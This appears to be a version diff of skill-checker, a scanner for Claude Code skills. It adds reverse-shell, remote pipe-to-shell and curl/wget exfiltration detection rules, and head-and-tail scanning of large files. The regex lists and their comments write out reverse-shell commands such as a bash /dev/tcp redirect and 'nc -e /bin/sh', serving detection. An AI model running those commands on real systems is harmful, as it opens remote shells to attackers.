skill-checker 0.1.5 → 0.1.7

package/README.md

@@ -4,7 +4,7 @@ Security checker for Claude Code skills — detect injection, malicious code, an
 
 ## Features
 
-- **53 security rules** across 6 categories: structural validity, content quality, injection detection, code safety, supply chain, and resource abuse
+- **55 security rules** across 6 categories: structural validity, content quality, injection detection, code safety, supply chain, and resource abuse
 - **Scoring system**: Grade A–F with 0–100 score
 - **Dual entry**: CLI tool + PreToolUse hook for automatic interception
 - **Configurable policies**: strict / balanced / permissive approval strategies
@@ -14,7 +14,7 @@ Security checker for Claude Code skills — detect injection, malicious code, an
 
 ## Security Standard & Benchmark
 
-Skill Checker's 53 rules are aligned with established security frameworks including OWASP Top 10 for LLM Applications (2025), MITRE CWE, and MITRE ATT&CK. The tool ships with a reproducible benchmark dataset of six fixture skills covering all rule categories. This alignment is an internal mapping exercise — Skill Checker does not claim third-party certification or external audit status.
+Skill Checker's 55 rules are aligned with established security frameworks including OWASP Top 10 for LLM Applications (2025), MITRE CWE, and MITRE ATT&CK. The tool ships with a reproducible benchmark dataset of six fixture skills covering all rule categories. This alignment is an internal mapping exercise — Skill Checker does not claim third-party certification or external audit status.
 
 See [docs/SECURITY_BENCHMARK.md](docs/SECURITY_BENCHMARK.md) for the full rule mapping matrix, benchmark methodology, scoring model, and known limitations.
 
@@ -98,6 +98,28 @@ The hook is fail-closed — if the scanner is unavailable, JSON parsing fails, o
 - `jq` must be installed for JSON parsing
 - `skill-checker` must be globally installed or available via `npx`
 
+## Dependency Security Maintenance
+
+Latest dependency audit follow-up (2026-03-07):
+
+- Production dependency risk remains unaffected (`npm audit --omit=dev`: **0 vulnerabilities**).
+- Current `npm audit` still reports **5 moderate** findings in dev tooling chain (`vitest` → `vite` → `esbuild`).
+- Upgrade to `vitest@4.0.18` is **temporarily deferred** because it requires Node `^20 || ^22 || >=24`, while this project currently supports Node `>=18`.
+- Scope of impact is limited to development/test tooling and does not affect runtime package dependencies.
+- Auditable risk acceptance record: [docs/RISK_ACCEPTANCE_DEVDEPS.md](docs/RISK_ACCEPTANCE_DEVDEPS.md).
+
+Verification commands used in this review cycle:
+
+```bash
+npm run lint
+npm test
+npm run build
+npm audit --omit=dev
+npm audit
+```
+
+Next review date: **2026-04-04**.
+
 ## Scoring
 
 Base score starts at **100**. Each finding deducts points by severity:
@@ -153,7 +175,7 @@ Config is resolved in order: CLI `--config` flag → project directory (walks up
 | Structural (STRUCT) | 8 | Missing SKILL.md, invalid frontmatter, binary files |
 | Content (CONT) | 7 | Placeholder text, lorem ipsum, promotional content |
 | Injection (INJ) | 9 | Zero-width chars, prompt override, tag injection, encoded payloads |
-| Code Safety (CODE) | 13 | eval/exec, shell execution, API key leakage, rm -rf, obfuscation |
+| Code Safety (CODE) | 15 | eval/exec, shell execution, reverse shell, data exfiltration, API key leakage, rm -rf, obfuscation |
 | Supply Chain (SUPPLY) | 10 | Unknown MCP servers, suspicious domains, malicious hashes, typosquat |
 | Resource Abuse (RES) | 6 | Unrestricted tool access, disable safety checks, ignore project rules |
 

package/dist/cli.js

@@ -150,14 +150,23 @@ function enumerateFiles(dirPath, warnings) {
             content = readFileSync(fullPath, "utf-8");
           } catch {
           }
-        } else if (lstats.size <= 5e7) {
+        } else {
           let fd;
           try {
             fd = openSync(fullPath, "r");
-            const buf = Buffer.alloc(PARTIAL_READ_LIMIT);
-            const bytesRead = readSync(fd, buf, 0, PARTIAL_READ_LIMIT, 0);
-            content = buf.slice(0, bytesRead).toString("utf-8");
-            warnings.push(`Large file partially scanned (first ${PARTIAL_READ_LIMIT} bytes): ${relativePath} (${lstats.size} bytes total)`);
+            const headBuf = Buffer.alloc(PARTIAL_READ_LIMIT);
+            const headBytesRead = readSync(fd, headBuf, 0, PARTIAL_READ_LIMIT, 0);
+            const headContent = headBuf.slice(0, headBytesRead).toString("utf-8");
+            const tailOffset = Math.max(0, lstats.size - PARTIAL_READ_LIMIT);
+            const tailBuf = Buffer.alloc(PARTIAL_READ_LIMIT);
+            const tailBytesRead = readSync(fd, tailBuf, 0, PARTIAL_READ_LIMIT, tailOffset);
+            const tailContent = tailBuf.slice(0, tailBytesRead).toString("utf-8");
+            content = tailOffset > 0 ? `${headContent}
+/* ... window gap ... */
+${tailContent}` : headContent;
+            warnings.push(
+              `Large file window-scanned (head+tail ${PARTIAL_READ_LIMIT} bytes each): ${relativePath} (${lstats.size} bytes total)`
+            );
           } catch {
             warnings.push(`Large file could not be read: ${relativePath} (${lstats.size} bytes)`);
           } finally {
@@ -168,8 +177,6 @@ function enumerateFiles(dirPath, warnings) {
               }
             }
           }
-        } else {
-          warnings.push(`File too large to scan: ${relativePath} (${lstats.size} bytes). Content not checked.`);
         }
       }
       files.push({
@@ -1077,6 +1084,28 @@ var ENV_ACCESS_PATTERNS = [
   /\bgetenv\s*\(/,
   /\$\{?\w*(?:KEY|TOKEN|SECRET|PASSWORD|CREDENTIAL|API_KEY)\w*\}?/i
 ];
+var REVERSE_SHELL_PATTERNS = [
+  /\/dev\/tcp\/[\w.-]+\/\d+/,
+  // bash -i >& /dev/tcp/host/port 0>&1
+  /\bnc(?:at)?\b[^\n]*\s-(?:e|c)\s+/,
+  // nc -e /bin/sh host port
+  /\bncat\b[^\n]*\s--exec\b/,
+  // ncat --exec /bin/sh host port
+  /\bsocket\.socket\s*\([^)]*\)[\s\S]*\.(?:connect|connect_ex)\s*\([^)]*\)[\s\S]*os\.dup2\s*\([^)]*\)[\s\S]*(?:subprocess\.(?:call|run|Popen)|os\.system)\s*\(/,
+  /\bphp\b[^\n]*\bfsockopen\s*\([^)]*\)[\s\S]*\b(?:exec|shell_exec|system|passthru)\s*\(/,
+  /\bperl\b[^\n]*\bSocket\b[\s\S]*\bconnect\s*\([^)]*\)[\s\S]*\bexec\s*\(/
+];
+var REMOTE_PIPELINE_EXEC_PATTERNS = [
+  /\bcurl\b[^\n|]*https?:\/\/[^\s|]+[^\n]*\|\s*(?:sh|bash|zsh|ksh|ash)\b/i,
+  /\bwget\b[^\n|]*https?:\/\/[^\s|]+[^\n]*\|\s*(?:sh|bash|zsh|ksh|ash)\b/i,
+  /\bcurl\b[^\n|]*https?:\/\/[^\s|]+[^\n]*\|\s*(?:python|python3|node)\b/i,
+  /\bwget\b[^\n|]*https?:\/\/[^\s|]+[^\n]*\|\s*(?:python|python3|node)\b/i
+];
+var DATA_EXFIL_PATTERNS = [
+  /\bcurl\b[^\n]*(?:-d|--data|--data-binary|--data-raw)\s+@(?:[^\s'"`]+|["'`][^"'`]+["'`])/i,
+  /\bcurl\b[^\n]*(?:-F|--form)\s+[^\s=]+=@(?:[^\s'"`]+|["'`][^"'`]+["'`])/i,
+  /\bwget\b[^\n]*--post-file(?:=|\s+)(?:[^\s'"`]+|["'`][^"'`]+["'`])/i
+];
 var DYNAMIC_CODE_PATTERNS = [
   /\bcompile\s*\(/,
   /\bcodegen\b/i,
@@ -1207,6 +1236,27 @@ var codeSafetyChecks = {
           source,
           codeBlockCtx: cbCtx
         });
+        checkPatterns(results, line, REVERSE_SHELL_PATTERNS, {
+          id: "CODE-014",
+          severity: "CRITICAL",
+          title: "Reverse shell pattern",
+          loc,
+          lineNum,
+          source
+        });
+        const code015 = detectCode015(line);
+        if (code015) {
+          results.push({
+            id: "CODE-015",
+            category: "CODE",
+            severity: code015.severity,
+            title: code015.title,
+            message: `At ${loc}: ${line.trim().slice(0, 120)}`,
+            line: lineNum,
+            snippet: line.trim().slice(0, 120),
+            source
+          });
+        }
         const credentialLeak = detectCredentialLeak(line);
         if (credentialLeak) {
           results.push({
@@ -1275,6 +1325,21 @@ function checkPatterns(results, line, patterns, opts) {
     }
   }
 }
+function detectCode015(line) {
+  if (REMOTE_PIPELINE_EXEC_PATTERNS.some((pattern) => pattern.test(line))) {
+    return {
+      severity: "CRITICAL",
+      title: "Remote pipeline execution pattern"
+    };
+  }
+  if (DATA_EXFIL_PATTERNS.some((pattern) => pattern.test(line))) {
+    return {
+      severity: "HIGH",
+      title: "Data exfiltration pattern"
+    };
+  }
+  return null;
+}
 function detectCredentialLeak(line) {
   for (const provider of PROVIDER_CREDENTIAL_PATTERNS) {
     if (provider.pattern.test(line)) {